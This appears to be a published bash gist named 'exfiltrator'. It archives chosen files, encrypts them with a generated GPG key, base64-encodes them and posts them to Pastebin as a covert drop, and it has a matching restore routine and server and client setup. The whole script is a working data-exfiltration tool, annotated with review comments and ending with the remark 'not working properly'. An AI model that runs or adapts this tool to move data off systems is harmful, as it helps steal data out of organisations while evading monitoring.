Exfiltrate data using pastebin-wrapper.sh and public-key cryptography.
#!/usr/bin/env bash
# -*- coding: utf-8 -*-
# LICENSE: fully open-source
# AUTHOR: @t4inha < github.com/andersonbosa >
# GIST:

# Name (user ID) of the GPG key pair that the functions below create and use.
EXFILTRATOR_KEY='exfiltrator-key'

# File names used for the ASCII-armored exports of that key pair.
PUBLIC_EXFILTRATOR_KEY="$EXFILTRATOR_KEY.public.key"
SECRET_EXFILTRATOR_KEY="$EXFILTRATOR_KEY.secret.key"

# Plain directory that receives the exported key files. No gpg call in this
# listing passes it as --homedir, so it is separate from gpg's own keyring.
GPG_KEYRING="${HOME}/.gpg"

# External commands the script relies on. Nothing in this listing reads the
# array, so their presence is not checked here.
DEPENDENCIES=('gpg' 'curl')
# Prints the command-line help text to stdout.
#
# @returns {void}
usage() {
  # One argument per help line; printf emits them in order, newline-terminated.
  printf '%s\n' \
    'exfiltrator [--help]' \
    'COMMANDS' \
    '-c | --create) Create a new SECURE paste to exfiltrate data throght the Pastebin.' \
    '-r | --restore) Restore a SECURE paste from Pastebin.' \
    '-v | --verbose) Make it verbose.' \
    '-h | --help) This help message.' \
    'SETUP' \
    '-ss | --setup-server) Setup a server to receive the data.' \
    '-sc | --setup-client) Setup a client to send the data.'
}
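#
# Generates the secret and public GPG key pair named by $EXFILTRATOR_KEY,
# unless gpg already reports a key matching that name.
#
# Globals read:    EXFILTRATOR_KEY
# Globals written: GENERATED_KEY (raw gpg output), KEY_ID (its second line)
#
# @see {@link https://www.misterpki.com/gpg-encrypt/}
# @returns {number} 0 when a key was generated, 1 when a matching key already
#                   exists, 2 when gpg fails to generate the key
exfiltrator::generate_key() {
  # Ask gpg for the key by name and rely on its exit status, instead of
  # text-matching the listing (which breaks when the name appears on several
  # lines of the output).
  if gpg --list-keys "$EXFILTRATOR_KEY" >/dev/null 2>&1; then
    #gpg: A key for "exfiltrator-key" already exists
    return 1
  fi

  echo "[INF] Generating your key ... type=rsa4096 permissions=sign,auth,encr expire_in=1m"
  # NOTE(review): the only gpg operations on this key visible in this listing
  # are encrypt and decrypt; the sign and auth capabilities look unnecessary.
  # Confirm and narrow the usage list if so.
  # Status 2 keeps a gpg failure distinct from the "already exists" status 1
  # that the caller tests for.
  GENERATED_KEY=$(gpg --quick-gen-key "$EXFILTRATOR_KEY" rsa4096 sign,auth,encr 1m) || return 2

  # Quoted so the multi-line gpg output reaches sed with its line breaks; the
  # second line is taken as the key id and xargs trims the padding around it.
  KEY_ID="$(printf '%s\n' "$GENERATED_KEY" | sed '2q;d' | xargs)"
  echo "[DONE] $EXFILTRATOR_KEY key generated with id: $KEY_ID"
  return 0
}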
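#
# Exports the $EXFILTRATOR_KEY key pair as ASCII-armored files in the
# $GPG_KEYRING directory and records both file paths in ~/.zshrc.
#
# Globals read: EXFILTRATOR_KEY, GPG_KEYRING, PUBLIC_EXFILTRATOR_KEY,
#               SECRET_EXFILTRATOR_KEY, HOME
#
# @param {string} $1 - KEY_ID passed by the caller; not read, the export is
#                      selected by $EXFILTRATOR_KEY
# @returns {number} 0 on success, non-zero when the directory cannot be
#                   created or an export fails
exfiltrator::export_gpg_keys_by_id() {
  local public_path="${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}"
  local secret_path="${GPG_KEYRING}/${SECRET_EXFILTRATOR_KEY}"
  local rc_file="${HOME}/.zshrc"
  local line

  echo "[INF] Exporting the GPG key: $EXFILTRATOR_KEY"
  mkdir -p -- "$GPG_KEYRING" || return
  gpg --armor --export "$EXFILTRATOR_KEY" >"$public_path" || return

  # The secret key file is created under a restrictive umask so it is never
  # readable by other local users, even briefly. The chmod covers the case
  # where the file already existed with wider permissions, because
  # redirecting into an existing file keeps its old mode.
  (umask 077 && gpg --armor --export-secret-keys "$EXFILTRATOR_KEY" >"$secret_path") || return
  chmod 600 -- "$secret_path" || return

  # Append each export line only when it is not already present, so repeated
  # runs do not keep growing ~/.zshrc.
  for line in \
    "export EXFILTRATOR_PUBLIC_KEY_FILEPATH=\"${public_path}\"" \
    "export EXFILTRATOR_SECRET_KEY_FILEPATH=\"${secret_path}\""; do
    grep -qxF -- "$line" "$rc_file" 2>/dev/null || printf '%s\n' "$line" >>"$rc_file"
  done

  echo "[DONE] Exported keys into $GPG_KEYRING:"
  ls -- "$GPG_KEYRING"
}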
#
# Encrypts the input file with gpg, passing the exported public key file at
# $GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY through the -f option.
#
# Globals read:    GPG_KEYRING, PUBLIC_EXFILTRATOR_KEY
# Globals written: INPUT_FILE, OUTPUT_FILE
#
# NOTE(review): $OUTPUT_FILE appears only in the log line and in the `file`
# call; the gpg command line carries no output option, so the reported name
# is not enforced here.
#
# @param {string} $1 INPUT_FILE - filepath
# @param {string} $2 OUTPUT_FILE - output filepath; "$1.gpg" when empty or omitted
# @returns {number} 0 always; the exit status of gpg is not checked
exfiltrator::encrypt_file() {
  INPUT_FILE="$1"
  # Fall back to "<input>.gpg" when no second argument was given.
  OUTPUT_FILE="${2:-${INPUT_FILE}.gpg}"

  printf '%s\n' "[INF] Encrypting '$INPUT_FILE' with GPG public key ..."
  gpg -e -f "${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" $INPUT_FILE
  printf '%s\n' "[DONE] Encrypted to '$OUTPUT_FILE'"
  file $OUTPUT_FILE
  return 0
}
#
# Creates a new item in Pastebin.
# Compresses the input into a .tgz archive, encrypts it with the public key,
# encodes the binary result with base64 and sends it to Pastebin as text.
#
# Globals written: INPUT_PATHNAME, TMP_PATHNAME, TAR_FILE, GPG_FILE, B64_FILE
#
# Host artifacts: a mktemp directory named exfiltrator.XXXXXXXXXX plus the
# .tgz and .b64 files written below. Nothing in this function deletes them.
# No exit status is checked, so later steps run even when an earlier one fails.
#
# @param {string} $1 INPUT_PATHNAME - path of the file or directory to send
# @returns {string} - whatever the external `pastebin` command prints
#                     (presumably the URL of the new item; confirm against
#                     pastebin-wrapper.sh)
function exfiltrator::create() {
  # TAR -> GPG -> B64 -> PASTEBIN
  INPUT_PATHNAME="$1"
  TMP_PATHNAME=$(mktemp -d -t exfiltrator.XXXXXXXXXX)
  # The working directory changes here, so every relative path used below,
  # including a relative $INPUT_PATHNAME, resolves inside the new directory.
  cd $TMP_PATHNAME
  echo "[INF] Created temporary directory: $TMP_PATHNAME"
  # The archive name is derived from the input path: with an absolute
  # $INPUT_PATHNAME the archive is written next to the input, not in the
  # temporary directory.
  TAR_FILE="$INPUT_PATHNAME.tgz"
  echo "[INF] Compressing '$INPUT_PATHNAME' in a tar file '$TAR_FILE'"
  tar -cz -f $TAR_FILE $INPUT_PATHNAME
  file $TAR_FILE
  GPG_FILE="$TAR_FILE.gpg"
  exfiltrator::encrypt_file $TAR_FILE $GPG_FILE
  B64_FILE="${GPG_FILE}.b64"
  # -w0 produces the base64 text as one unwrapped line.
  cat "$GPG_FILE" | base64 -w0 >$B64_FILE
  echo "[INF] Encoded '$GPG_FILE' using base64 to '$B64_FILE'"
  file $B64_FILE
  echo "[INF] Transmiting '$B64_FILE'..."
  # The whole base64 text is handed to `pastebin` as a single command-line
  # argument, so it is part of that process's argv and shows up wherever
  # process command lines are listed or recorded. `pastebin` itself is not
  # defined in this listing.
  pastebin "$(cat $B64_FILE)"
  # Back to the previous working directory; the temporary directory stays.
  cd - >/dev/null
}
#
# Restores a Pastebin item into a fresh temporary directory.
# PASTEBIN -> B64 -> GPG -> TAR
#
# Globals written: PASTEBIN_KEY, GPG_FILE, TAR_FILE, TMP_PATHNAME
#
# The paste is encrypted to a public key and carries no signature that this
# function checks, so a successful decryption says nothing about who produced
# it: treat the extracted files as untrusted input.
# No exit status is checked, so later steps run even when an earlier one fails.
#
# @params {string} $1 PASTEBIN_KEY - Item id at Pastebin URL
function exfiltrator::restore() {
  PASTEBIN_KEY="$1"
  # Both file names are built from the caller-supplied id without validation.
  GPG_FILE="${PASTEBIN_KEY}.gpg"
  TAR_FILE="${GPG_FILE}.tgz"
  TMP_PATHNAME=$(mktemp -d -t exfiltrator.XXXXXXXXXX)
  # Relative file names below resolve inside the new temporary directory.
  cd $TMP_PATHNAME
  echo "[INF] Created temporary directory: $TMP_PATHNAME"
  echo "[INF] Recovering exfiltred paste: '$PASTEBIN_KEY'..."
  # `pastebin` is an external command not defined in this listing; its output
  # is base64-decoded straight into $GPG_FILE.
  pastebin -g $PASTEBIN_KEY | base64 -d >$GPG_FILE
  echo "[INF] Decrypting $GPG_FILE ..."
  # NOTE(review): the public key file is passed with -f on a --decrypt call,
  # while decryption needs the secret key from the gpg keyring; confirm this
  # option has any effect here.
  gpg --output $TAR_FILE --decrypt -f "${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" $GPG_FILE
  echo "[INF] Extraing $TAR_FILE ..."
  # Extraction happens in the current directory with whatever member names
  # the archive contains.
  tar -xz -f $TAR_FILE
  echo "[DONE] Paste recovered in '$TMP_PATHNAME'"
  ls $TMP_PATHNAME
  # The working directory is not restored and the temporary directory is
  # left in place.
}
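#
# Imports the exported secret and public key files from $GPG_KEYRING into the
# gpg keyring of the current user, secret key first.
#
# Globals read: EXFILTRATOR_KEY, GPG_KEYRING, SECRET_EXFILTRATOR_KEY,
#               PUBLIC_EXFILTRATOR_KEY
#
# @param {string} $1 - KEY_ID passed by the caller; not read
# @returns {number} 0 when both imports succeed, otherwise the status of the
#                   gpg call that failed
exfiltrator::import_gpg_keys_by_id() {
  local key_file

  echo "[INF] Importing public and secret GPG keys: $EXFILTRATOR_KEY"
  for key_file in \
    "${GPG_KEYRING}/${SECRET_EXFILTRATOR_KEY}" \
    "${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}"; do
    # Quoted so a keyring path containing spaces or glob characters reaches
    # gpg as exactly one argument; a failed import stops the function.
    gpg --import "$key_file" || return
  done
}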
#
# Prepares the server to receive client data that is going to be encrypted
# with the public key: generates the key pair, exports it to $GPG_KEYRING,
# imports the exported files, then prints the follow-up steps.
#
# Globals read:    EXFILTRATOR_KEY, GPG_KEYRING, PUBLIC_EXFILTRATOR_KEY
# Globals written: KEY_ID
#
# @returns {number} 1 when exfiltrator::generate_key exits with status 1
#                   (key already exists); otherwise the status of the final
#                   message
exfiltrator::setup_server() {
  printf '%s\n' "[INF] Preparing server ..."

  # KEY_ID receives everything generate_key writes to stdout. Only exit
  # status 1 is treated as "key already exists"; any other status continues.
  KEY_ID=$(exfiltrator::generate_key)
  case $? in
    1)
      printf '%s\n' \
        "[ERR] The key already exists. Please manually remove it before generating a new one. Exiting ..." \
        "[TIP] gpg --delete-secret-and-public-keys $EXFILTRATOR_KEY"
      return 1
      ;;
  esac

  # The results of the export and import steps are not checked.
  exfiltrator::export_gpg_keys_by_id $EXFILTRATOR_KEY
  exfiltrator::import_gpg_keys_by_id $EXFILTRATOR_KEY

  printf '%s\n' \
    "[INF] Exporting the GPG key: $EXFILTRATOR_KEY" \
    "[WRN] Keep your secret key safe! " \
    "[INF] In client side use 'exfiltrator --setup-client'. Give your public key '$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY' to the client." \
    "[TIP] Client script to install exfiltrator and setup client: https://gist.github.com/andersonbosa/29616c16e87159b6aad5e354fedcf2c0" \
    "[DONE] Complete setup in server to receive data."
}
#
# Prepares the client to send data to the server using asymmetric
# encryption: opens an editor so the server's public key can be pasted into
# $GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY, records that path in ~/.zshrc and
# imports the key into gpg.
#
# Globals read:    GPG_KEYRING, PUBLIC_EXFILTRATOR_KEY
# Globals written: KEY_PATH
#
# NOTE(review): the key is imported exactly as pasted; nothing here compares
# its fingerprint with the one on the server.
#
# @returns {number} status of the final message
exfiltrator::setup_client() {
  mkdir -p $GPG_KEYRING
  KEY_PATH="$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY"

  printf '%s\n' \
    "[INF] Paste exfiltrator public key from the server in the following file... openning..." \
    "[TIP] Get your public key from '$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY' on the server side."
  sleep 1s
  # Interactive step: the editor is fixed to nano.
  nano $KEY_PATH

  printf '%s\n' "[INF] Exporting exfiltrator public key in .zshrc"
  # A new line is appended on every run.
  printf 'export EXFILTRATOR_PUBLIC_KEY_FILEPATH="%s"\n' "$KEY_PATH" >>~/.zshrc
  # The whole ~/.zshrc is read into the current shell, not just the new line.
  . ~/.zshrc

  gpg --import $KEY_PATH
  printf '%s\n' "[DONE] Client setuped to send data."
}
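#
# Command-line entry point: walks the arguments and dispatches the first
# recognised command to its handler.
#
# Globals written: IS_VERBOSE ("1" after -v; nothing in this listing reads
#                  it), PARAMS (space-joined positional arguments)
#
# @param {string} $@ - option flags as listed by usage(); -c and -r take one value
# @returns {number} 0 after a handler was dispatched (the handler's own
#                   status is not propagated) or when only -v / positional
#                   arguments were given; 1 for --help, an unsupported flag,
#                   or a missing option value
exfiltrator() {
  local -a positional=()
  IS_VERBOSE="0"
  PARAMS=""

  while (($#)); do
    case "$1" in
      -ss | --setup-server)
        exfiltrator::setup_server
        return 0
        ;;
      -sc | --setup-client)
        exfiltrator::setup_client
        return 0
        ;;
      -c | --create)
        # The value must be present and must not look like another flag.
        if [[ -n "${2-}" && "${2:0:1}" != "-" ]]; then
          exfiltrator::create "$2"
          return 0
        else
          echo "[ERR] Argument for $1 is missing" >&2
          return 1
        fi
        ;;
      -r | --restore)
        if [[ -n "${2-}" && "${2:0:1}" != "-" ]]; then
          exfiltrator::restore "$2"
          return 0
        else
          echo "[ERR] Argument for $1 is missing. Example: zbFdeRRK" >&2
          return 1
        fi
        ;;
      -v | --verbose)
        IS_VERBOSE="1"
        shift
        ;;
      -h | --help)
        usage
        return 1
        ;;
      -* | --*=) # unsupported flags
        echo "[ERR] Unsupported flag: $1" >&2
        return 1
        ;;
      *) # preserve positional arguments
        PARAMS="$PARAMS $1"
        positional+=("$1")
        shift
        ;;
    esac
  done

  # Set positional arguments in their proper place. They are restored from an
  # array rather than through eval, so argument text is never re-parsed as
  # shell code (a value such as "x; some-command" stays one literal word).
  set -- "${positional[@]}"
}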
not working properly